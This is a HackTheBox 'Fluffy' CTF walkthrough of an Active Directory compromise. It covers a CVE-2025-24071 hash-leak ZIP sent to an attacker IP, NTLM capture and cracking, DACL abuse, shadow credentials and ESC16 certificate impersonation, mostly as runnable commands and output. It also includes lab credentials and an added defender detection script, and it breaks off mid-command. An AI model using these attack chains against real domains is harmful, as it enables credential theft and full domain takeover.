Author: Nullbyte
Date: 2025-07-12
Fluffy is a HackTheBox machine that goes after the fundamentals of a corporate network, exploiting every vulnerable detail, every byte, every bit.
Let's hack!
Credentials:
As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!
Recon
┌──(root㉿kali)-[/tmp]
└─# scan fluffy.htb
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.85.197:53
Open 10.129.85.197:88
Open 10.129.85.197:139
Open 10.129.85.197:389
Open 10.129.85.197:445
Open 10.129.85.197:464
Open 10.129.85.197:593
Open 10.129.85.197:636
Open 10.129.85.197:3269
Open 10.129.85.197:3268
Open 10.129.85.197:5985
Open 10.129.85.197:9389
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-07-30 03:02:41Z)
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
| -----BEGIN CERTIFICATE-----
| MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF[...]
|_ssl-date: 2025-07-30T03:04:18+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-30T03:04:16+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
| -----BEGIN CERTIFICATE-----
| MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF[...]
|_-----END CERTIFICATE-----
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
| -----BEGIN CERTIFICATE-----
| MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF[...]
|_-----END CERTIFICATE-----
|_ssl-date: 2025-07-30T03:04:18+00:00; +7h00m00s from scanner time.
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-30T03:04:16+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
| -----BEGIN CERTIFICATE-----
| MIIGJzCCBQ+gAwIBAgITUAAAAAJKRwEaLBjVaAAAAAAAAjANBgkqhkiG9w0BAQsF[...]
|_-----END CERTIFICATE-----
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49681/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49682/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49690/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49704/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49717/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=7/29%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=68892942%P=x86_64-pc-linux-gnu)
SEQ(SP=103%GCD=1%ISR=108%TI=I%II=I%SS=S%TS=U)
SEQ(SP=104%GCD=1%ISR=10D%TI=I%II=I%SS=S%TS=U)
OPS(O1=M552NW8NNS%O2=M552NW8NNS%O3=M552NW8%O4=M552NW8NNS%O5=M552NW8NNS%O6=M552NNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M552NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 43914/tcp): CLEAN (Timeout)
| Check 2 (port 45400/tcp): CLEAN (Timeout)
| Check 3 (port 29708/udp): CLEAN (Timeout)
| Check 4 (port 37110/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-07-30T03:03:37
|_ start_date: N/A
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
TRACEROUTE (using port 49690/tcp)
HOP RTT ADDRESS
1 144.00 ms 10.10.14.1 (10.10.14.1)
2 145.84 ms fluffy.htb (10.129.85.197)
[0x0539] > Looking at the scan, we can see a few ports that will probably be very important: 445, 389, 88 and 5985. We will start by looking at the SMB service, which is used for file sharing and can even lead to remote code execution (depending on the user).
- Trick: using nxc to enumerate SMB
┌──(root㉿kali)-[/tmp]
└─# nxc smb fluffy.htb -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares
SMB 10.129.85.197 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.85.197 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.129.85.197 445 DC01 [*] Enumerated shares
SMB 10.129.85.197 445 DC01 Share Permissions Remark
SMB 10.129.85.197 445 DC01 ----- ----------- ------
SMB 10.129.85.197 445 DC01 ADMIN$ Remote Admin
SMB 10.129.85.197 445 DC01 C$ Default share
SMB 10.129.85.197 445 DC01 IPC$ READ Remote IPC
SMB 10.129.85.197 445 DC01 IT READ,WRITE
SMB 10.129.85.197 445 DC01 NETLOGON READ Logon server share
SMB 10.129.85.197 445 DC01 SYSVOL READ Logon server share
┌──(root㉿kali)-[/tmp]
└─# smbclient //fluffy.htb/IT -U 'j.fleischman' -c 'ls'
Password for [WORKGROUP\j.fleischman]:
. D 0 Tue Jul 29 23:23:33 2025
.. D 0 Tue Jul 29 23:23:33 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 11:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 11:04:05 2025
KeePass-2.58 D 0 Fri Apr 18 11:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 11:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 10:31:07 2025
5842943 blocks of size 4096. 1844516 blocks available
┌──(root㉿kali)-[/tmp]
└─# smbclient //fluffy.htb/IT -U 'j.fleischman' -c 'ls;get Upgrade_Notice.pdf'
Password for [WORKGROUP\j.fleischman]:
. D 0 Tue Jul 29 23:23:33 2025
.. D 0 Tue Jul 29 23:23:33 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 11:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 11:04:05 2025
KeePass-2.58 D 0 Fri Apr 18 11:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 11:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 10:31:07 2025
5842943 blocks of size 4096. 1880881 blocks available
getting file \Upgrade_Notice.pdf of size 169963 as Upgrade_Notice.pdf (148.2 KiloBytes/sec) (average 148.2 KiloBytes/sec)
[0x0539] > Opening the PDF, we discover that one of the listed vulnerabilities is present on the network. We have a very interesting vulnerability; searching the internet, we find a CVE that lets us gain some access.
CVE-2025-24071 -> https://github.com/FOLKS-iwd/CVE-2025-24071-msfvenom
-Exploitation Vulnerabilities-
[0x0539] > Running the steps to generate the payload with Metasploit
msf6 auxiliary(server/ntlm_hash_leak) > options
Module options (auxiliary/server/ntlm_hash_leak):
Name Current Setting Required Description
---- --------------- -------- -----------
ATTACKER_IP yes The IP address to which the SMB request will be sent
FILENAME exploit.zip yes The name of the ZIP file to create
LIBRARY_NAME malicious.library-ms yes The name of the .library-ms file
SHARE_NAME shared yes The SMB share name to use in the .library-ms file
View the full module info with the info, or info -d command.
msf6 auxiliary(server/ntlm_hash_leak) > set ATTACKER_IP 10.10.14.184
ATTACKER_IP => 10.10.14.184
msf6 auxiliary(server/ntlm_hash_leak) > exploit
[*] Malicious ZIP file created: exploit.zip
[*] Host the file and wait for the victim to extract it.
[*] Ensure you have an SMB capture server running to collect NTLM hashes.
[*] Auxiliary module execution completed
msf6 auxiliary(server/ntlm_hash_leak) > pwd
[*] exec: pwd
/root/windows/ctf/fluffy/CVE-2025-24071-msfvenom
[0x0539] > Uploading the payload created by Metasploit
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# ls
exploit.zip ntlm_hash_leak.rb README.md
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# smbclient //fluffy.htb/IT -U 'j.fleischman'
Password for [WORKGROUP\j.fleischman]:
Try "help" to get a list of possible commands.
smb: \> put exploit.zip
putting file exploit.zip as \exploit.zip (0.8 kb/s) (average 0.8 kb/s)
smb: \>
[0x0539] > "Sniffing" the network until we obtain the hash of user p.agila
┌──(root㉿kali)-[/home/nullbyte]
└─# responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.6.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.85.197
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:HIDDEN
[0x0539] > "Cracking" the hash of user p.agila
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash_p.agila
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
prometheusx-303 (p.agila)
1g 0:00:00:10 DONE (2025-07-29 17:42) 0.09354g/s 422579p/s 422579c/s 422579C/s proquis..prom pics
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
[0x0539] > Checking which permissions I have as user p.agila
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# bloodyAD --host 10.129.85.197 -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=fluffy,DC=htb
permission: WRITE
distinguishedName: CN=Prometheus Agila,CN=Users,DC=fluffy,DC=htb
permission: WRITE
distinguishedName: CN=Service Accounts,CN=Users,DC=fluffy,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
[0x0539] > User p.agila has some important permissions, such as DACL and OWNER.
[0x0539] > We can therefore take ownership of the group and gain full control over the group's objects; as owner, we gain privileges over every account that belongs to that group!
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# bloodyAD --host 10.129.85.197 -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' set owner "CN=Service Accounts,CN=Users,DC=fluffy,DC=htb" p.agila
[+] Old owner S-1-5-21-497550768-2797716248-2627064577-512 is now replaced by p.agila on CN=Service Accounts,CN=Users,DC=fluffy,DC=htb
[0x0539] > Adding full permissions over the Service Accounts group for user p.agila
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# bloodyAD --host 10.129.85.197 -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' add genericAll "CN=Service Accounts,CN=Users,DC=fluffy,DC=htb" p.agila
[+] p.agila has now GenericAll on CN=Service Accounts,CN=Users,DC=fluffy,DC=htb
[0x0539] > Adding user p.agila to the Service Accounts group
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# bloodyAD --host 10.129.85.197 -d fluffy.htb -u 'p.agila' -p 'prometheusx-303' add groupMember "CN=Service Accounts,CN=Users,DC=fluffy,DC=htb" p.agila
[+] p.agila added to CN=Service Accounts,CN=Users,DC=fluffy,DC=htb
[0x0539] > Identifying the members of the Service Accounts group.
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# ldapsearch -x -H ldap://10.129.85.197 -D 'p.agila@fluffy.htb' -w 'prometheusx-303' -b "CN=Service Accounts,CN=Users,DC=fluffy,DC=htb" | grep member
member: CN=winrm service,CN=Users,DC=fluffy,DC=htb
member: CN=ldap service,CN=Users,DC=fluffy,DC=htb
member: CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
[0x0539] > As we can see, there are 3 members, and they are named after services. Two of them are interesting to us: winrm and certificate authority.
[0x0539] > Remember that we have DACL permission? We can run a shadow credentials attack against these service accounts!
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# pywhisker --dc-host 10.129.85.197 -d fluffy.htb -u p.agila -p 'prometheusx-303' \
    -t winrm_svc -a add
[*] Searching for the target account
[*] Target user found: CN=winrm service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 27d0d9a6-ada7-3dda-2ac3-1cf08fd76e61
[*] Updating the msDS-KeyCredentialLink attribute of winrm_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: Qhe8WZes.pfx
[+] PFX exportiert nach: Qhe8WZes.pfx
[i] Passwort für PFX: 4xN1LvZWPxl2VRHyampW
[+] Saved PFX (#PKCS12) certificate & key at path: Qhe8WZes.pfx
[*] Must be used with password: 4xN1LvZWPxl2VRHyampW
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
[0x0539] > After obtaining the PFX (in this case I will do it with winrm), we can connect through it and get our user.txt flag!
Remember that certificates in AD are quite important: if we obtain a certificate for some user, we can get that user's hash from a simple certificate!
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# certipy auth -pfx Qhe8WZes.pfx -password "4xN1LvZWPxl2VRHyampW" -username 'winrm_svc' \
    -dc-ip 10.129.85.197 -ns 10.129.85.197 -domain fluffy.htb -no-save
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] No identities found in this certificate
[!] Could not find identity in the provided certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Got hash for 'winrm_svc@fluffy.htb':
[0x0539] > Grabbing the flag!
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# evil-winrm -i 10.129.85.197 -u 'winrm_svc' -p 'hash ntlm'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> dir
Directory: C:\Users\winrm_svc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/29/2025 8:00 PM 34 user.txt
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> type user.txt
0c169e83b26e682d HIDDEN HAHAHAHA
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop>
[0x0539] > Now let's look at the certificate authority service account and see what permissions it has.
┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy -debug account -username 'ca_svc' -hashes ':hash' \
    -dc-ip 10.129.85.197 -ns 10.129.85.197 -target DC01.fluffy.htb -user 'ca_svc' read
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[+] Nameserver: '10.129.164.91'
[+] DC IP: '10.129.164.91'
[+] DC Host: 'DC01.fluffy.htb'
[+] Target IP: '10.129.164.91'
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: ''
[+] Username: 'CA_SVC'
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.129.164.91:636 - ssl
[+] Default path: DC=fluffy,DC=htb
[+] Configuration path: CN=Configuration,DC=fluffy,DC=htb
[*] Reading attributes for 'ca_svc':
cn : certificate authority service
distinguishedName : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
name : certificate authority service
objectSid : S-1-5-21-497550768-2797716248-2627064577-1103
sAMAccountName : ca_svc
servicePrincipalName : ADCS/ca.fluffy.htb
userPrincipalName : administrator
userAccountControl : 66048
whenCreated : 2025-04-17T16:07:50+00:00
whenChanged : 2025-08-01T21:53:02+00:00
[0x0539] > Let's generate a TGT so we can log in to the account on any service :)
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# python3 /root/windows/python3-impacket/examples/getTGT.py fluffy.htb/ca_svc \
    -hashes 'hash ntlm'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in ca_svc.ccache
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# export KRB5CCNAME=ca_svc.ccache
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# klist
Ticket cache: FILE:ca_svc.ccache
Default principal: ca_svc@FLUFFY.HTB
Valid starting Expires Service principal
07/30/2025 01:49:13 07/30/2025 11:49:13 krbtgt/FLUFFY.HTB@FLUFFY.HTB
renew until 07/31/2025 01:49:12
[0x0539] > Checking for vulnerable templates: now that we have access to the CA_SVC account, we can abuse certificates!
We can see there is a certificate vulnerability called ESC16. In short, this vulnerability allows generating a certificate that impersonates any user by changing the UPN.
Here is the example: we are the user ca_svc and we have control over ADCS. We add the administrator's UPN to our ca_svc account, so we can request a certificate from the User template. Since the UPN is the administrator's, the ca_svc user ends up impersonating the administrator and we obtain the administrator's PFX. The attack chain follows below.
If you are interested in understanding it in detail:
https://medium.com/@muneebnawaz3849/ad-cs-esc16-misconfiguration-and-exploitation-9264e022a8c6
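As an added, defender-side example that is not part of the original writeup, this Python script shows what the two directory changes used in this chain look like in audit data: the msDS-KeyCredentialLink write behind the shadow-credentials step above (Event ID 5136) and the ESC16 UPN swap described here (Event ID 4738, followed by a certificate issuance, Event ID 4887). The event dicts, account list, timestamps and the `helpdesk` account are constructed and simplified, not real Windows event records.

```python
"""Audit-side view of two changes this chain makes in the directory.

Constructed, simplified event records (not real Windows Security log
parsing); the account names follow the writeup's domain.
  - 5136: directory object modified  (shadow credentials write the
          msDS-KeyCredentialLink attribute of the victim account)
  - 4738: user account changed       (ESC16 step sets ca_svc's UPN to
          'administrator')
  - 4887: certificate issued         (the User-template request that
          carries the hijacked UPN)
"""

DOMAIN = "fluffy.htb"
# Accounts from the writeup; in a real deployment this comes from LDAP.
KNOWN_ACCOUNTS = {"administrator", "ca_svc", "winrm_svc", "ldap_svc",
                  "p.agila", "j.fleischman"}

# Constructed sample events; 'time' is seconds, kept simple on purpose.
SAMPLE_EVENTS = [
    {"id": 5136, "time": 100, "subject": "FLUFFY\\p.agila",
     "object": "CN=winrm service,CN=Users,DC=fluffy,DC=htb",
     "attribute": "msDS-KeyCredentialLink", "operation": "Value Added"},
    {"id": 4738, "time": 200, "subject": "FLUFFY\\ca_svc", "target": "ca_svc",
     "attribute": "userPrincipalName", "new_value": "administrator"},
    {"id": 4887, "time": 210, "requester": "FLUFFY\\ca_svc",
     "subject_upn": "administrator", "template": "User"},
    {"id": 4738, "time": 300, "subject": "FLUFFY\\ca_svc", "target": "ca_svc",
     "attribute": "userPrincipalName", "new_value": "ca_svc@fluffy.htb"},
    # Benign (constructed): helpdesk sets a user's UPN to that same user.
    {"id": 4738, "time": 400, "subject": "FLUFFY\\helpdesk", "target": "j.fleischman",
     "attribute": "userPrincipalName", "new_value": "j.fleischman@fluffy.htb"},
]


def upn_owner(upn):
    """Return the sAMAccountName a UPN names (with or without @suffix), or None."""
    local, _, suffix = upn.partition("@")
    if suffix and suffix.lower() != DOMAIN:
        return None  # foreign suffix: not one of our accounts
    local = local.lower()
    return local if local in KNOWN_ACCOUNTS else None


def detect_shadow_credentials(events):
    """Every write to msDS-KeyCredentialLink is worth a look: only device
    enrolment / Windows Hello for Business should normally touch it."""
    return [f"msDS-KeyCredentialLink written on {e['object']} by {e['subject']}"
            for e in events
            if e["id"] == 5136
            and e["attribute"].lower() == "msds-keycredentiallink"]


def detect_upn_hijack(events, window=600):
    """Flag a UPN change whose new value names a *different* known account
    (the ESC16 identity swap), and note a certificate issued for that UPN
    within `window` seconds of the change."""
    findings = []
    changes = [e for e in events
               if e["id"] == 4738 and e["attribute"] == "userPrincipalName"]
    issued = [e for e in events if e["id"] == 4887]
    for ch in changes:
        victim = upn_owner(ch["new_value"])
        if victim is None or victim == ch["target"].lower():
            continue  # UPN points at its own account: normal administration
        msg = (f"UPN of {ch['target']} set to '{ch['new_value']}' "
               f"(collides with account {victim})")
        for cert in issued:
            delta = cert["time"] - ch["time"]
            if cert["subject_upn"].lower() == ch["new_value"].lower() and 0 <= delta <= window:
                msg += (f"; certificate for that UPN issued from template "
                        f"{cert['template']} {delta}s later by {cert['requester']}")
        findings.append(msg)
    return findings


def run(events=SAMPLE_EVENTS):
    """Combine both detections into one list of findings."""
    return detect_shadow_credentials(events) + detect_upn_hijack(events)


if __name__ == "__main__":
    for line in run():
        print(line)
```

The revert of ca_svc's UPN to its own value later in the chain is deliberately not flagged, so the signal is the collision with another account, not the change itself.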
┌──(root㉿kali)-[~/windows/ctf/fluffy/CVE-2025-24071-msfvenom]
└─# certipy find -username 'ca_svc' -k -dc-ip 10.129.85.197 -ns 10.129.85.197 -target DC01.fluffy.htb
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
[!] Vulnerabilities
ESC16 : Security Extension is disabled.
[0x0539] > Exploiting ESC16 by changing the UPN of CA_SVC
┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy -debug account -username 'ca_svc' -hashes ':hash' \
    -dc-ip 10.129.85.197 -ns 10.129.85.197 -target DC01.fluffy.htb -upn 'administrator' \
    -user 'ca_svc' update
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[+] Nameserver: '10.129.164.91'
[+] DC IP: '10.129.164.91'
[+] DC Host: 'DC01.fluffy.htb'
[+] Target IP: '10.129.164.91'
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: ''
[+] Username: 'CA_SVC'
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.129.164.91:636 - ssl
[+] Default path: DC=fluffy,DC=htb
[+] Configuration path: CN=Configuration,DC=fluffy,DC=htb
[*] Updating user 'ca_svc':
userPrincipalName : administrator
[*] Successfully updated 'ca_svc'
[0x0539] > Confirming that the administrator's UPN is set
┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy -debug account -username 'ca_svc' -hashes ':hash' \
    -dc-ip 10.129.85.197 -ns 10.129.85.197 -target DC01.fluffy.htb -user 'ca_svc' read
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[+] Nameserver: '10.129.164.91'
[+] DC IP: '10.129.164.91'
[+] DC Host: 'DC01.fluffy.htb'
[+] Target IP: '10.129.164.91'
[+] Remote Name: 'DC01.fluffy.htb'
[+] Domain: ''
[+] Username: 'CA_SVC'
[+] Authenticating to LDAP server using NTLM authentication
[+] Using NTLM signing: False (LDAP signing: True, SSL: True)
[+] Using channel binding signing: True (LDAP channel binding: True, SSL: True)
[+] Using LDAP channel binding for NTLM authentication
[+] LDAP NTLM authentication successful
[+] Bound to ldaps://10.129.164.91:636 - ssl
[+] Default path: DC=fluffy,DC=htb
[+] Configuration path: CN=Configuration,DC=fluffy,DC=htb
[*] Reading attributes for 'ca_svc':
cn : certificate authority service
distinguishedName : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
name : certificate authority service
objectSid : S-1-5-21-497550768-2797716248-2627064577-1103
sAMAccountName : ca_svc
servicePrincipalName : ADCS/ca.fluffy.htb
userPrincipalName : administrator
userAccountControl : 66048
whenCreated : 2025-04-17T16:07:50+00:00
whenChanged : 2025-08-01T21:53:02+00:00
[0x0539] > Obtaining the administrator's PFX
┌──(root㉿kali)-[~/windows/ctf/fluffy]
└─# certipy -debug req -username 'administrator' -hashes ':hash' -dc-ip 10.129.85.197 -ns 10.129.85.197 -target DC01.fluffy.htb -ca 'fluffy-DC01-CA' -template 'User'
